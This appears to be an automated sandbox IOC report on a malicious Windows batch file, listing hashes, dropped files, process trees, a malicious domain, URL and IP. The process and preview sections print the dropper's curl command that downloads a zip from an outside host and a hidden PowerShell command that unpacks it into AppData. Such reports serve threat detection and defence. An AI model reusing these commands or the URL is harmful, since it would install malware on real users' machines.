Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

Download

batch file malware.bat

DOS batch file, ASCII text, with CRLF line terminators

initial sample

Details

Filetype:	DOS batch file, ASCII text, with CRLF line terminators
Entropy:	5.550147012633201
Filename:	batch file malware.bat
Filesize:	706
MD5:	6ec79021ae9c27ded0f52866130ba850
SHA1:	9b7496149c503057dba40c2f659da70291f1397d
SHA256:	bfdafe2875fe11bb2b5b36549310f7f96bc4d44a2821c06b030088fee2e64818
SHA512:	e407f16b68fc69855273f96151154d5acaf45bf680b758a108272a51d037f9b1815c4af65498783cc03e7370c5e1ba7823e61351768d11b72dfe11f2f22d2a38
SSDEEP:	12:wbYVJXJNFAOwAwxbQClfnugXFSu/BNCu/62T981kv1Sf/BCGJjf+2Yjf0fV8Vj0A:wqXvFAOwPbduS1KOvYhCiWljst8VcnIj
Preview:	@echo off..setlocal enabledelayedexpansion....set "LCVCGBKO=https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98c"..set "MBHRSHD=%APPDATA%\MyApp23"..set "CZAHPKO=%APPDATA%\count.zip"..set "LYMINHSKU=!MBHRSHD!\client32.exe"....if not exist "!MBHRSH

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

C:\Users\user\AppData\Roaming\count.zip

HTML document, ASCII text

dropped

Details

File:	C:\Users\user\AppData\Roaming\count.zip
Category:	dropped
Dump:	count.zip.3.dr
ID:	dr_0
Target ID:	3
Process:	C:\Windows\System32\curl.exe
Type:	HTML document, ASCII text
Entropy:	5.203385659658708
Encrypted:	false
Ssdeep:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoIRCw2b8oD:J0+oxBeRmR9etdzRxGezHt2b8+
Size:	274
Whitelisted:	false
Reputation:	timeout

Signature Hits	Behavior Group	Mitre Attack
Suspicious powershell command line found	Data Obfuscation	PowerShell
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

data

dropped

Details

File:	C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Category:	dropped
Dump:	StartupProfileData-NonInteractive.9.dr
ID:	dr_5
Target ID:	9
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	5.3949719777566125
Encrypted:	false
Ssdeep:	24:3SSKco4KmBs4RPT6BmFoUvjKzu1o+m9qr9t7J0gt/NKmNUND9r8Hl:CSU4y4RQmFoUL5a+m9qr9tK8NfUNhW
Size:	1332
Whitelisted:	false
Reputation:	low

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bdy1a0js.m3a.ps1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bdy1a0js.m3a.ps1
Category:	dropped
Dump:	__PSScriptPolicyTest_bdy1a0js.m3a.ps1.9.dr
ID:	dr_1
Target ID:	9
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Creates temporary files	System Summary

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxt3qzyx.ud3.ps1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxt3qzyx.ud3.ps1
Category:	dropped
Dump:	__PSScriptPolicyTest_pxt3qzyx.ud3.ps1.9.dr
ID:	dr_3
Target ID:	9
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	high

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xl1i4x4w.iow.psm1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xl1i4x4w.iow.psm1
Category:	dropped
Dump:	__PSScriptPolicyTest_xl1i4x4w.iow.psm1.9.dr
ID:	dr_2
Target ID:	9
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	high

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zy4z3wuk.130.psm1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zy4z3wuk.130.psm1
Category:	dropped
Dump:	__PSScriptPolicyTest_zy4z3wuk.130.psm1.9.dr
ID:	dr_4
Target ID:	9
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	timeout

Processes

Path

Cmdline

Malicious

C:\Windows\System32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\batch file malware.bat" "

Details

Is windows:	true
Is dropped:	false
PID:	7548
Target ID:	1
Parent PID:	3084
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\batch file malware.bat" "
Size:	289792
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
Time:	00:07:34
Date:	19/04/2025
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff685230000
Modulesize:	421888
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Executes batch files	System Summary	Scripting
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\count.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\MyApp23' -Force"

Details

Is windows:	true
Is dropped:	false
PID:	8016
Target ID:	9
Parent PID:	7548
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	powershell -WindowStyle Hidden -Command "Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\count.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\MyApp23' -Force"
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	00:07:36
Date:	19/04/2025
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff7785e0000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Suspicious powershell command line found	Data Obfuscation	PowerShell
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	7564
Target ID:	2
Parent PID:	7548
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	00:07:34
Date:	19/04/2025
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff7e2000000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Windows\System32\curl.exe

curl -s -o "C:\Users\user\AppData\Roaming\count.zip" "https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98c"

Details

Is windows:	true
Is dropped:	false
PID:	7628
Target ID:	3
Parent PID:	7548
Name:	curl.exe
Path:	C:\Windows\System32\curl.exe
Commandline:	curl -s -o "C:\Users\user\AppData\Roaming\count.zip" "https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98c"
Size:	530944
MD5:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Time:	00:07:34
Date:	19/04/2025
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6f5950000
Modulesize:	548864
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98cl

unknown

https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98c23

unknown

https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98cLOCALAPPDATA=C:

unknown

Details

Name:	https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98cLOCALAPPDATA=C:
TargetID:	3
From Memory:	true
Current Path:	C:\Windows\System32\curl.exe
Source:	curl.exe, 00000003.00000002.1286743174.0000025BD2190000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.1287005204.0000025BD2400000.00000004.00000020.00020000.00000000.sdmp

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98cZ3

unknown

https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98c

77.83.199.142

Details

Name:	https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98c
IP:	77.83.199.142
TargetID:	3
From Memory:	false
Current Path:	C:\Windows\System32\curl.exe
Source:	network

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

Domains

Name

Malicious

umpmfss.top

77.83.199.142

Details

Name:	umpmfss.top
IP:	77.83.199.142
TargetID:	-1
Active:	true
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

IPs

Domain

Country

Malicious

77.83.199.142

umpmfss.top

Lithuania

Details

IP:	77.83.199.142
TargetID:	3
Current Path:	C:\Windows\System32\curl.exe
Country:	Lithuania
Countrycode:	LTU
ASN number:	12679
ASN name:	ASN-MOLMoscowRussiaRU
Private:	false
Domain:	umpmfss.top

Signature Hits	Behavior Group	Mitre Attack
Uses secure TLS version for HTTPS connections	Compliance, Networking

127.0.0.1

unknown

Memdumps

Base Address

Regiontype

Protect

Malicious

Download

25BD21AF000

heap

page read and write

25BD2290000

heap

page read and write

25BD21F5000

heap

page read and write

25BD21A3000

heap

page read and write

25BD2180000

remote allocation

page read and write

25BD21DA000

heap

page read and write

25BD21CC000

heap

page read and write

25BD22B0000

heap

page read and write

25BD220F000

heap

page read and write

25BD21F5000

heap

page read and write

25BD21B0000

heap

page read and write

25BD21CB000

heap

page read and write

25BD21DF000

heap

page read and write

25BD2190000

heap

page read and write

25BD21A9000

heap

page read and write

25BD21AA000

heap

page read and write

25BD220F000

heap

page read and write

25BD21AF000

heap

page read and write

25BD21DB000

heap

page read and write

25BD21A6000

heap

page read and write

25BD21DE000

heap

page read and write

25BD21CB000

heap

page read and write

25BD21AF000

heap

page read and write

25BD21AE000

heap

page read and write

25BD2404000

heap

page read and write

25BD20A0000

heap

page read and write

25BD21A1000

heap

page read and write

25BD2180000

remote allocation

page read and write

25BD220F000

heap

page read and write

25BD21E5000

heap

page read and write

25BD21DA000

heap

page read and write

7A1D2FC000

stack

page read and write

25BD2197000

heap

page read and write

25BD2400000

heap

page read and write

7A1D4FE000

stack

page read and write

25BD21AD000

heap

page read and write

25BD21CC000

heap

page read and write

25BD21B2000

heap

page read and write

25BD2180000

remote allocation

page read and write

7A1D3FF000

stack

page read and write

There are 30 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
batch file malware.bat

Files

Processes

URLs

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportbatch file malware.bat

Files

Processes

URLs

Domains

IPs

Memdumps

IOC Report
batch file malware.bat